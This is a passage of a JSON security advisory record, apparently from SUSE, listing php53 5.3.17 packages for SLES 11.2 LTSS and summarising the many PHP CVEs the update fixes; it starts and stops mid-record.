"11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fileinfo-5.3.17-47.1.i586.rpm", "packageName": "php53-fileinfo", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pgsql-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pgsql", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlrpc-5.3.17-47.1.x86_64.rpm", "packageName": "php53-xmlrpc", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ctype-5.3.17-47.1.x86_64.rpm", "packageName": "php53-ctype", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-openssl-5.3.17-47.1.s390x.rpm", "packageName": "php53-openssl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zip-5.3.17-47.1.s390x.rpm", "packageName": "php53-zip", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pcntl-5.3.17-47.1.i586.rpm", "packageName": "php53-pcntl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pear-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pear", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dba-5.3.17-47.1.i586.rpm", "packageName": "php53-dba", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvsem-5.3.17-47.1.i586.rpm", "packageName": "php53-sysvsem", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gmp-5.3.17-47.1.s390x.rpm", "packageName": "php53-gmp", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlrpc-5.3.17-47.1.i586.rpm", "packageName": "php53-xmlrpc", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-curl-5.3.17-47.1.i586.rpm", "packageName": "php53-curl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pear-5.3.17-47.1.i586.rpm", "packageName": "php53-pear", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fileinfo-5.3.17-47.1.s390x.rpm", "packageName": "php53-fileinfo", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pdo-5.3.17-47.1.i586.rpm", "packageName": "php53-pdo", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gettext-5.3.17-47.1.i586.rpm", "packageName": "php53-gettext", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlreader-5.3.17-47.1.x86_64.rpm", "packageName": "php53-xmlreader", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-curl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-curl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gmp-5.3.17-47.1.i586.rpm", "packageName": "php53-gmp", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvshm-5.3.17-47.1.s390x.rpm", "packageName": "php53-sysvshm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlwriter-5.3.17-47.1.i586.rpm", "packageName": "php53-xmlwriter", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-calendar-5.3.17-47.1.x86_64.rpm", "packageName": "php53-calendar", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-5.3.17-47.1.s390x.rpm", "packageName": "php53", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlrpc-5.3.17-47.1.s390x.rpm", "packageName": "php53-xmlrpc", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ftp-5.3.17-47.1.s390x.rpm", "packageName": "php53-ftp", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-snmp-5.3.17-47.1.i586.rpm", "packageName": "php53-snmp", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-wddx-5.3.17-47.1.x86_64.rpm", "packageName": "php53-wddx", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fileinfo-5.3.17-47.1.x86_64.rpm", "packageName": "php53-fileinfo", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pspell-5.3.17-47.1.i586.rpm", "packageName": "php53-pspell", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mbstring-5.3.17-47.1.x86_64.rpm", "packageName": "php53-mbstring", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pgsql-5.3.17-47.1.i586.rpm", "packageName": "php53-pgsql", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mbstring-5.3.17-47.1.i586.rpm", "packageName": "php53-mbstring", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-openssl-5.3.17-47.1.i586.rpm", "packageName": "php53-openssl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gettext-5.3.17-47.1.s390x.rpm", "packageName": "php53-gettext", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fastcgi-5.3.17-47.1.x86_64.rpm", "packageName": "php53-fastcgi", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mcrypt-5.3.17-47.1.s390x.rpm", "packageName": "php53-mcrypt", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlreader-5.3.17-47.1.i586.rpm", "packageName": "php53-xmlreader", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-curl-5.3.17-47.1.s390x.rpm", "packageName": "php53-curl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "apache2-mod_php53-5.3.17-47.1.x86_64.rpm", "packageName": "apache2-mod_php53", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dom-5.3.17-47.1.x86_64.rpm", "packageName": "php53-dom", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-intl-5.3.17-47.1.s390x.rpm", "packageName": "php53-intl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlreader-5.3.17-47.1.s390x.rpm", "packageName": "php53-xmlreader", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zip-5.3.17-47.1.i586.rpm", "packageName": "php53-zip", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlwriter-5.3.17-47.1.x86_64.rpm", "packageName": "php53-xmlwriter", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bcmath-5.3.17-47.1.i586.rpm", "packageName": "php53-bcmath", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "apache2-mod_php53-5.3.17-47.1.s390x.rpm", "packageName": "apache2-mod_php53", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pgsql-5.3.17-47.1.s390x.rpm", "packageName": "php53-pgsql", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bz2-5.3.17-47.1.x86_64.rpm", "packageName": "php53-bz2", "arch": "x86_64", "operator": "lt"}], "edition": 1, "description": "This update for php53 to version 5.3.17 fixes the following issues:\n\n These security issues were fixed:\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n - CVE-2016-5094: Don't create strings with lengths outside int range\n (bnc#982011).\n - CVE-2016-5095: Don't create strings with lengths outside int range\n (bnc#982012).\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP\n mishandles driver behavior for SQL_WVARCHAR columns, which allowed\n remote attackers to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the odbc_fetch_array\n function to access a certain type of Microsoft SQL Server table\n (bsc#981050).\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP allowed remote attackers to\n execute arbitrary code by triggering a failed SplMinHeap::compare\n operation (bsc#980366).\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed\n remote attackers to cause a denial of service via a crafted\n imagefilltoborder call (bsc#980375).\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c\n in PHP allowed remote attackers to cause a denial of service\n (segmentation fault) via recursive method calls (bsc#980373).\n - CVE-2016-4540: The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829).\n - CVE-2016-4541: The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829.\n - CVE-2016-4542: The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP did not properly construct spprintf arguments, which allowed remote\n attackers to cause a denial of service (out-of-bounds read) or possibly\n have unspecified other impact via crafted header data (bsc#978830).\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in ext/exif/exif.c\n in PHP did not validate IFD sizes, which allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in ext/exif/exif.c\n in PHP did not validate TIFF start data, which allowed remote attackers\n to cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4537: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n accepted a negative integer for the scale argument, which allowed remote\n attackers to cause a denial of service or possibly have unspecified\n other impact via a crafted call (bsc#978827).\n - CVE-2016-4538: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n modified certain data structures without considering whether they are\n copies of the _zero_, _one_, or _two_ global variable, which allowed\n remote attackers to cause a denial of service or possibly have\n unspecified other impact via a crafted call (bsc#978827).\n - CVE-2016-4539: The xml_parse_into_struct function in ext/xml/xml.c in\n PHP allowed remote attackers to cause a denial of service (buffer\n under-read and segmentation fault) or possibly have unspecified other\n impact via crafted XML data in the second argument, leading to a parser\n level of zero (bsc#978828).\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles zero-length\n uncompressed data, which allowed remote attackers to cause a denial of\n service (heap memory corruption) or possibly have unspecified other\n impact via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive (bsc#977991).\n - CVE-2016-4346: Integer overflow in the str_pad function in\n ext/standard/string.c in PHP allowed remote attackers to cause a denial\n of service or possibly have unspecified other impact via a long string,\n leading to a heap-based buffer overflow (bsc#977994).\n - CVE-2016-4073: Multiple integer overflows in the mbfl_strcut function in\n ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via a crafted mb_strcut call (bsc#977003).\n - CVE-2015-8867: The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP incorrectly relied on the deprecated\n RAND_pseudo_bytes function, which made it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors\n (bsc#977005).\n - CVE-2016-4070: Integer overflow in the php_raw_url_encode function in\n ext/standard/url.c in PHP allowed remote attackers to cause a denial of\n service (application crash) via a long string to the rawurlencode\n function (bsc#976997).\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM is used, did not\n isolate each thread from libxml_disable_entity_loader changes in other\n threads, which allowed remote attackers to conduct XML External Entity\n (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document,\n a related issue to CVE-2015-5161 (bsc#976996).\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a client SSL option to\n mean that SSL is optional, which allowed man-in-the-middle attackers to\n spoof servers via a cleartext-downgrade attack, a related issue to\n CVE-2015-3152 (bsc#973792).\n - CVE-2015-8835: The make_http_soap_request function in\n ext/soap/php_http.c in PHP did not properly retrieve keys, which allowed\n remote attackers to cause a denial of service (NULL pointer dereference,\n type confusion, and application crash) or possibly execute arbitrary\n code via crafted serialized data representing a numerically indexed\n _cookies array, related to the SoapClient::__call method in\n ext/soap/soap.c (bsc#973351).\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP allowed remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly have unspecified\n other impact by triggering a wddx_deserialize call on XML data\n containing a crafted var element (bsc#969821).\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a PK\\x05\\x06\n signature at an invalid location (bsc#971912).\n - CVE-2014-9767: Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in PHP\n ext/zip/ext_zip.cpp in HHVM allowed remote attackers to create arbitrary\n empty directories via a crafted ZIP archive (bsc#971612).\n - CVE-2016-3185: The make_http_soap_request function in\n ext/soap/php_http.c in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized _cookies data,\n related to the SoapClient::__call method in ext/soap/soap.c (bsc#971611).\n - CVE-2016-2554: Stack-based buffer overflow in ext/phar/tar.c in PHP\n allowed remote attackers to cause a denial of service (application\n crash) or possibly have unspecified other impact via a crafted TAR\n archive (bsc#968284).\n - CVE-2015-7803: The phar_get_entry_data function in ext/phar/util.c in\n PHP allowed remote attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file with a crafted TAR\n archive entry in which the Link indicator references a file that did not\n exist (bsc#949961).\n - CVE-2015-6831: Multiple use-after-free vulnerabilities in SPL in PHP\n allowed remote attackers to execute arbitrary code via vectors involving\n (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList,\n which are mishandled during unserialization (bsc#942291).\n - CVE-2015-6833: Directory traversal vulnerability in the PharData class\n in PHP allowed remote attackers to write to arbitrary files via a ..\n (dot dot) in a ZIP archive entry that is mishandled during an extractTo\n call (bsc#942296.\n - CVE-2015-6836: The SoapClient __call method in ext/soap/soap.c in PHP\n did not properly manage headers, which allowed remote attackers to\n execute arbitrary code via crafted serialized data that triggers a "type\n confusion" in the serialize_function_call function (bsc#945428).\n - CVE-2015-6837: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation during initial error checking, which allowed remote attackers\n to cause a denial of service (NULL pointer dereference and application\n crash) via a crafted XML document, a different vulnerability than\n CVE-2015-6838 (bsc#945412).\n - CVE-2015-6838: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation after the principal argument loop, which allowed remote\n attackers to cause a denial of service (NULL pointer dereference and\n application crash) via a crafted XML document, a different vulnerability\n than CVE-2015-6837 (bsc#945412).\n - CVE-2015-5590: Stack-based buffer overflow in the phar_fix_filepath\n function in ext/phar/phar.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via a large\n length value, as demonstrated by mishandling of an e-mail attachment by\n the imap PHP extension (bsc#938719).\n - CVE-2015-5589: The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP did not validate a file pointer a close\n operation, which allowed remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other impact via a\n crafted TAR archive that is mishandled in a Phar::convertToData call\n (bsc#938721).\n - CVE-2015-4602: The __PHP_Incomplete_Class function in\n ext/standard/incomplete_class.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935224).\n - CVE-2015-4599: The SoapFault::__toString method in ext/soap/soap.c in\n PHP allowed remote attackers to obtain sensitive information, cause a\n denial of service (application crash), or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935226).\n - CVE-2015-4600: The SoapClient implementation in PHP allowed remote\n attackers to cause a denial of service (application crash) or possibly\n execute arbitrary code via an unexpected data type, related to "type\n confusion" issues in the (1) SoapClient::__getLastRequest, (2)\n SoapClient::__getLastResponse, (3) SoapClient::__getLastRequestHeaders,\n (4) SoapClient::__getLastResponseHeaders, (5) SoapClient::__getCookies,\n and (6) SoapClient::__setCookie methods (bsc#935226).\n - CVE-2015-4601: PHP allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code via an unexpected\n data type, related to "type confusion" issues in (1)\n ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and (3)\n ext/soap/soap.c, a different issue than CVE-2015-4600 (bsc#935226.\n - CVE-2015-4603: The exception::getTraceAsString function in\n Zend/zend_exceptions.c in PHP allowed remote attackers to execute\n arbitrary code via an unexpected data type, related to a "type\n confusion" issue (bsc#935234).\n - CVE-2015-4644: The php_pgsql_meta_data function in pgsql.c in the\n PostgreSQL (aka pgsql) extension in PHP did not validate token\n extraction for table names, which might allowed remote attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) via a crafted name. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2015-1352 (bsc#935274).\n - CVE-2015-4643: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow. NOTE: this vulnerability exists because of an incomplete fix\n for CVE-2015-4022 (bsc#935275).\n - CVE-2015-3411: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n load method, (2) the xmlwriter_open_uri function, (3) the finfo_file\n function, or (4) the hash_hmac_file function, as demonstrated by a\n filename\\0.xml attack that bypasses an intended configuration in which\n client users may read only .xml files (bsc#935227).\n - CVE-2015-3412: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read arbitrary files via\n crafted input to an application that calls the\n stream_resolve_include_path function in ext/standard/streamsfuncs.c, as\n demonstrated by a filename\\0.extension attack that bypasses an intended\n configuration in which client users may read files with only one\n specific extension (bsc#935229).\n - CVE-2015-4598: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n save method or (2) the GD imagepsloadfont function, as demonstrated by a\n filename\\0.html attack that bypasses an intended configuration in which\n client users may write to only .html files (bsc#935232).\n - CVE-2015-4148: The do_soap_call function in ext/soap/soap.c in PHP did\n not verify that the uri property is a string, which allowed remote\n attackers to obtain sensitive information by providing crafted\n serialized data with an int data type, related to a "type confusion"\n issue (bsc#933227).\n - CVE-2015-4024: Algorithmic complexity vulnerability in the\n multipart_buffer_headers function in main/rfc1867.c in PHP allowed\n remote attackers to cause a denial of service (CPU consumption) via\n crafted form data that triggers an improper order-of-growth outcome\n (bsc#931421).\n - CVE-2015-4026: The pcntl_exec implementation in PHP truncates a pathname\n upon encountering a \\x00 character, which might allowed remote attackers\n to bypass intended extension restrictions and execute files with\n unexpected names via a crafted first argument. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2006-7243 (bsc#931776).\n - CVE-2015-4022: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow (bsc#931772).\n - CVE-2015-4021: The phar_parse_tarfile function in ext/phar/tar.c in PHP\n did not verify that the first character of a filename is different from\n the \\0 character, which allowed remote attackers to cause a denial of\n service (integer underflow and memory corruption) via a crafted entry in\n a tar archive (bsc#931769).\n - CVE-2015-3329: Multiple stack-based buffer overflows in the\n phar_set_inode function in phar_internal.h in PHP allowed remote\n attackers to execute arbitrary code via a crafted length value in a (1)\n tar, (2) phar, or (3) ZIP archive (bsc#928506).\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote attackers to obtain\n sensitive information from process memory or cause a denial of service\n (buffer over-read and application crash) via a crafted length value in\n conjunction with crafted serialized data in a phar archive, related to\n the phar_parse_metadata and phar_parse_pharfile functions (bsc#928511).\n - CVE-2015-2787: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages use of the unset function within an __wakeup function, a\n related issue to CVE-2015-0231 (bsc#924972).\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in GD 2.1.1 and\n earlier, as used in PHP allowed remote attackers to cause a denial of\n service (buffer over-read and application crash) via a crafted GIF image\n that is improperly handled by the gdImageCreateFromGif function\n (bsc#923945).\n - CVE-2015-2301: Use-after-free vulnerability in the phar_rename_archive\n function in phar_object.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via vectors\n that trigger an attempted renaming of a Phar archive to the name of an\n existing file (bsc#922452).\n - CVE-2015-2305: Integer overflow in the regcomp implementation in the\n Henry Spencer BSD regex library (aka rxspencer) 32-bit platforms might\n have allowed context-dependent attackers to execute arbitrary code via a\n large regular expression that leads to a heap-based buffer overflow\n (bsc#921950).\n - CVE-2014-9705: Heap-based buffer overflow in the\n enchant_broker_request_dict function in ext/enchant/enchant.c in PHP\n allowed remote attackers to execute arbitrary code via vectors that\n trigger creation of multiple dictionaries (bsc#922451).\n - CVE-2015-0273: Multiple use-after-free vulnerabilities in\n ext/date/php_date.c in PHP allowed remote attackers to execute arbitrary\n code via crafted serialized input containing a (1) R or (2) r type\n specifier in (a) DateTimeZone data handled by the\n php_date_timezone_initialize_from_hash function or (b) DateTime data\n handled by the php_date_initialize_from_hash function (bsc#918768).\n - CVE-2014-9652: The mconvert function in softmagic.c in file as used in\n the Fileinfo component in PHP did not properly handle a certain\n string-length field during a copy of a truncated version of a Pascal\n string, which might allowed remote attackers to cause a denial of\n service (out-of-bounds memory access and application crash) via a\n crafted file (bsc#917150).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate numerical keys within the\n serialized properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142 (bsc#910659).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP allowed remote attackers to execute arbitrary code or cause a denial\n of service (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bsc#914690).\n - CVE-2014-3670: The exif_ifd_make_value function in exif.c in the EXIF\n extension in PHP operates on floating-point arrays incorrectly, which\n allowed remote attackers to cause a denial of service (heap memory\n corruption and application crash) or possibly execute arbitrary code via\n a crafted JPEG image with TIFF thumbnail data that is improperly handled\n by the exif_thumbnail function (bsc#902357).\n - CVE-2014-3669: Integer overflow in the object_custom function in\n ext/standard/var_unserializer.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an argument to the unserialize function that triggers\n calculation of a large length value (bsc#902360).\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601 function in the\n mkgmtime implementation in libxmlrpc/xmlrpc.c in the XMLRPC extension in\n PHP allowed remote attackers to cause a denial of service (application\n crash) via (1) a crafted first argument to the xmlrpc_set_type function\n or (2) a crafted argument to the xmlrpc_decode function, related to an\n out-of-bounds read operation (bsc#902368).\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR in PHP allowed\n local users to write to arbitrary files via a symlink attack on a (1)\n rest.cachefile or (2) rest.cacheid file in /tmp/pear/cache/, related to\n the retrieveCacheFirst and useLocalCache functions (bsc#893849).\n - CVE-2014-3597: Multiple buffer overflows in the php_parserr function in\n ext/standard/dns.c in PHP allowed remote DNS servers to cause a denial\n of service (application crash) or possibly execute arbitrary code via a\n crafted DNS record, related to the dns_get_record function and the\n dn_expand function. NOTE: this issue exists because of an incomplete fix\n for CVE-2014-4049 (bsc#893853).\n - CVE-2014-4670: Use-after-free vulnerability in ext/spl/spl_dllist.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n iterator usage within applications in certain web-hosting environments\n (bsc#886059).\n - CVE-2014-4698: Use-after-free vulnerability in ext/spl/spl_array.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n ArrayIterator usage within applications in certain web-hosting\n environments (bsc#886060).\n - CVE-2014-4721: The phpinfo implementation in ext/standard/info.c in PHP\n did not ensure use of the string data type for the PHP_AUTH_PW,\n PHP_AUTH_TYPE, PHP_AUTH_USER, and PHP_SELF variables, which might\n allowed context-dependent attackers to obtain sensitive information from\n process memory by using the integer data type with crafted values,\n related to a "type confusion" 